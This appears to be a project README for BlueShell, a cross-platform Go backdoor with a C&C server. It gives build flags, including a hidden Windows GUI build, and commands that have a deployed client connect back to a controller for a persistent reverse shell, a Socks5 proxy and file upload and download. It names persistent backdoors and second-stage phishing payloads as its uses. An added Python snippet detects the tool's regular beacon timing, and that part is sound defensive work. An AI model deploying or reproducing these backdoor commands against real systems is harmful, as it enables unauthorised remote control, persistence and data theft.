whitehatnote / Blueshell

Cross-platform remote-control tool for red/blue team exercises

BlueShell

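BlueShell is a persistent remote-control tool written in Go. After a target machine has been taken, you download and deploy the bsClient build that matches its operating system. The client then attempts a reverse connection to the specified C&C address at a fixed interval, and running bsServer on the C&C side connects to bsClient, giving persistent control of the target. Main use cases:

  • Persistent backdoor or internal-network proxy in red/blue team exercises
  • Second-stage payload loading in social-engineering phishing

Main features currently supported:

  • Persistent control in a reconnect loop
  • Cross-platform: Linux, Windows and MacOS
  • Reverse interactive shell; on Linux it supports interactive operations such as Tab completion, VIM and Ctrl+C, while Windows only supports a plain reverse shell
  • Reverse Socks5 proxy
  • File upload and download
  • TLS-encrypted communication

Project URL: https://github.com/whitehatnote/BlueShell

Building the executables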

Linux and MacOS

Build bsClient

go get github.com/armon/go-socks5
go get github.com/creack/pty
go get github.com/hashicorp/yamux

go build --ldflags "-s -w " -o bsClient client.go

Build bsServer

go get github.com/creack/pty
go get github.com/hashicorp/yamux
go get github.com/djimenez/iconv-go
go get golang.org/x/crypto/ssh/terminal

go build --ldflags "-s -w " -o bsServer server.go

Windows

Build bsClient

go get github.com/armon/go-socks5
go get github.com/creack/pty
go get github.com/hashicorp/yamux

go build --ldflags "-s -w -H=windowsgui" -o bsClient.exe client.go

Usage

Client

Run bsClient on the controlled target machine

Windows target:

Start with the default configuration

start /b bsClient.exe

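Start with parameters: -h specifies the controller address, -p the port the controller listens on, and -t the interval in seconds between connection attempts to the controller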

start /b bsClient.exe -h 10.0.0.1 -p 443 -t 10

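Linux and MacOS target:

Start with the default configuration

nohup bsClient &

Start with parameters: -h specifies the controller address, -p the port the controller listens on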

nohup bsClient -h 10.0.0.1 -p 443 &
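
Because the client retries at a fixed interval (-t) and the session content is TLS-encrypted, connection timing is what a defender can still observe. The following is an added example, not part of the BlueShell project: it flags flows whose outbound connection attempts are almost evenly spaced. The log format, the source addresses and the thresholds are assumptions, and the sample log is constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: one outbound connection attempt per line, "time src dst:port".
SAMPLE_LOG = """\
2024-01-01T12:00:00 192.168.1.20 10.0.0.1:443
2024-01-01T12:00:02 192.168.1.31 203.0.113.5:443
2024-01-01T12:00:03 192.168.1.31 203.0.113.5:443
2024-01-01T12:00:10 192.168.1.20 10.0.0.1:443
2024-01-01T12:00:21 192.168.1.20 10.0.0.1:443
2024-01-01T12:00:30 192.168.1.20 10.0.0.1:443
2024-01-01T12:00:40 192.168.1.31 203.0.113.5:443
2024-01-01T12:00:40 192.168.1.20 10.0.0.1:443
2024-01-01T12:00:50 192.168.1.20 10.0.0.1:443
2024-01-01T12:01:55 192.168.1.31 203.0.113.5:443
2024-01-01T12:04:10 192.168.1.31 203.0.113.5:443
"""


def find_beacons(log, min_events=5, max_jitter=0.1):
    """Return (flow, mean_gap_seconds, jitter) for evenly spaced flows.

    jitter = population stddev of the gaps / mean gap (assumed thresholds).
    """
    attempts = defaultdict(list)
    for line in log.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines
        try:
            attempts[(fields[1], fields[2])].append(datetime.fromisoformat(fields[0]))
        except ValueError:
            continue  # skip unparsable timestamps
    beacons = []
    for flow, times in sorted(attempts.items()):
        if len(times) < min_events:
            continue  # too few samples to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append((flow, avg, round(pstdev(gaps) / avg, 3)))
    return beacons


if __name__ == "__main__":
    for (src, dst), period, jitter in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}: every {period:.0f}s, jitter {jitter}")
```

A retry loop only produces this pattern while the controller is unreachable or between sessions, so the check belongs on failed and short-lived connections as well as established ones.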

C&C Server

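Run bsServer on the controller. It must be a Linux machine, and the key directory must be in the same directory as bsServer. A successful start looks like this: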

[[email protected] BluesShell]# ls -al
总用量 4148
drwxr-xr-x   3 root root    4096 6月  17 22:14 .
drwxrwxrwt. 10 root root   40960 6月  17 22:13 ..
-rwxr-xr-x   1 root root 4193320 6月  17 22:13 bsServer
drwxr-xr-x   2 root root    4096 6月  17 22:13 key
[[email protected] BluesShell]# ./bsServer
waiting for client connect...

Action: reverse shell

Default start: the controller listens on port 8081 and performs the reverse shell action

./bsServer

Start with parameters: -p sets the controller to listen on port 443, -a selects the reverse shell action

./bsServer -p 443 -a shell

To fix garbled output from Windows targets, -rencode specifies the target's character encoding

./bsServer -rencode gb2312

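Action: reverse Socks5 proxy

Default start: the controller listens on port 8081 and performs the reverse socks action; the socks5 proxy listens on port 7777 by default, the default username is blue, and the default password is [email protected]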

./bsServer -a socks

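Start with parameters: -p sets the controller to listen on port 443, -a selects the reverse socks action, -sport sets the socks listening port to 7778, -suser sets the socks proxy authentication account, and -spass sets the socks proxy authentication password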

./bsServer -p 443 -a socks -sport 7778 -suser socksUser -spass socksPassword

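Action: file upload and download

Upload a local file to the controlled target: -lpath specifies the path of the local file to upload, -rdir the directory to upload it to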

./bsServer -a upload -lpath /tmp/tmp.txt -rdir c:\\

Download a file from the controlled target: -rpath specifies the path of the file to download, -ldir the local directory in which to store it

./bsServer -a download -rpath c:\\tmp.txt -ldir /tmp

0x4. References